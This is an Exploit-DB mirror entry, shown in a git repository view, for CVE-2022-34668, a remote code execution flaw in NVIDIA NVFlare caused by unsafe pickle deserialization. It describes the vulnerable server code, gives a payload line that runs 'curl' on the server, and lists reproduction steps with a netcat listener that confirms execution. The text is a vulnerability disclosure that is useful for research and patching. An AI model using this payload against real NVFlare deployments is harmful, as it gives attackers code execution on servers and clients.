bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/python/remote/51051.txt
Exploit-DB 79023d1f9c DB: 2023-03-26 
22 changes to exploits/shellcodes/ghdb

Password Manager for IIS v2.0 - XSS

DLink DIR 819 A1 - Denial of Service

D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution

Abantecart v1.3.2 - Authenticated Remote Code Execution

Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)

Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution

Employee Performance Evaluation System v1.0 - File Inclusion and RCE

GuppY CMS v6.00.10 - Remote Code Execution

Human Resources Management System v1.0 - Multiple SQLi

ImpressCMS v1.4.3 - Authenticated SQL Injection

Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal

MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution

NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS

SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution

Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection

Yoga Class Registration System v1.0 - Multiple SQLi

NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle

_camp_ Raspberry Pi camera server 1.0 -  Authentication Bypass

System Mechanic v15.5.0.61 - Arbitrary Read/Write
2023-03-26 00:16:30 +00:00

73 lines
No EOL
3.1 KiB
Text
Raw Permalink Blame History

# Exploit Title: NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle
# Exploit Author: Elias Hohl
# Google Dork: N/A
# Date: 2022-06-21
# Vendor Homepage: https://www.nvidia.com
# Software Link: https://github.com/NVIDIA/NVFlare
# Version: < 2.1.4
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-34668
https://medium.com/@elias.hohl/remote-code-execution-in-nvidia-nvflare-c140bb6a2d55
There is a Remote Code Execution vulnerability https://github.com/NVIDIA/NVFlare. It is possible to execute arbitrary commands on the server for connected clients. It was not investigated if server can also execute commands on all clients (I expect this though, as it is by design required for the server to instruct the clients to execute commands if they need to train specific models). The consequence would be that a client can gain Remote Code Execution on the server an ALL connected clients.
The vulnerability exists due to the deserialization of user data with the pickle module. There are multiple places where this is done, I considered line 568 on private/fed/server/fed_server.py the occurrence that is accessible with the least efforts and thus used it in my PoC-Exploit.
The client generates a malicious data packet like this: aux_message.data["fl_context"].CopyFrom(bytes_to_proto(generate_payload('curl http://127.0.0.1:4321')))
REPLICATION
This example uses the server in poc-mode. The provision mode seems to run the same code in fed_server.py though and should be vulnerable as well. (To my understanding, the modes differ only regarding credentials).
This exploit replicates the Quickstart tutorial https://nvidia.github.io/NVFlare/quickstart.html with a maliciously modified client to execute commands on the server.
Make sure to use Python 3.8, the nightly builds don't work with Python >=3.9.
sudo apt update
sudo apt-get install python3-venv curl
python3 -m venv nvflare-env
source nvflare-env/bin/activate
python3 -m pip install -U pip
python3 -m pip install -U setuptools
python3 -m pip install torch torchvision tensorboard
git clone https://github.com/NVIDIA/NVFlare.git
cd NVFlare
git checkout 2.1.2
git apply nvflare-exploit-apply.txt # note that this only modifies the client side code
python3 -m pip install .
cd
poc -n 2
mkdir -p poc/admin/transfer
cp -rf NVFlare/examples/* poc/admin/transfer
In four separate terminals, execute (after running source nvflare-env/bin/activate in each one):
./poc/server/startup/start.sh
./poc/site-1/startup/start.sh
./poc/site-2/startup/start.sh
./poc/admin/startup/fl_admin.sh localhost
In another terminal window, fire up a netcat instance to verify that Remote Code Execution is possible:
nc -lvp 4321
In the admin console, execute:
check_status server
to verify both clients are connected. Then:
submit_job hello-pt-tb
It will take a few minutes until the job finishes downloading the required files, then you should see a connection in the netcat tab and error messages in the server tab (because the received pickle payload is no data that the program can continue working with). You can also shutdown netcat, which will result in "Connection refused" errors in the server tab.
Reference in a new issue View git blame Copy permalink